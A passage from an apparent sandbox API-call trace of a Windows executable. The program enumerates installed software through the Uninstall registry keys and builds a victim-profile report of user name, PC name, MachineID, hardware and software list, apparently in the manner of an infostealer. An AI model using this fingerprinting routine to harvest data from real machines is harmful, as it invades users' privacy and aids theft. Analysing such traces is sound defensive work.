16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 " [0208.116] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 ", lpString2="10.0.40219" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219" [0208.116] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\n" [0208.116] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.117] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x24, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.117] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757") returned 104 [0208.117] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.117] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0x31, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.117] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.117] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x25, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.117] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173") returned 104 [0208.117] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.117] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0x31, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.117] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.117] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x26, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.117] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860") returned 104 [0208.118] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.118] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0x31, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.118] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.118] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x27, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.118] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655") returned 104 [0208.118] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.118] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0x31, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.118] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.118] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x28, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.118] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743") returned 104 [0208.118] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.118] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0x31, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.118] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.118] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x29, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.118] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063") returned 104 [0208.118] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.118] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0x31, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.119] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.119] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x2a, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.119] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573") returned 103 [0208.119] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.119] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x0, lpData=0x19ca18*=0x31, lpcbData=0x19ce18*=0x400) returned 0x2 [0208.119] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.119] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x2b, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.119] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}") returned 94 [0208.119] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.119] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005", lpcbData=0x19ce18*=0x3e) returned 0x0 [0208.119] lstrlenA (lpString="Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005") returned 61 [0208.119] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\n", lpString2="Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United 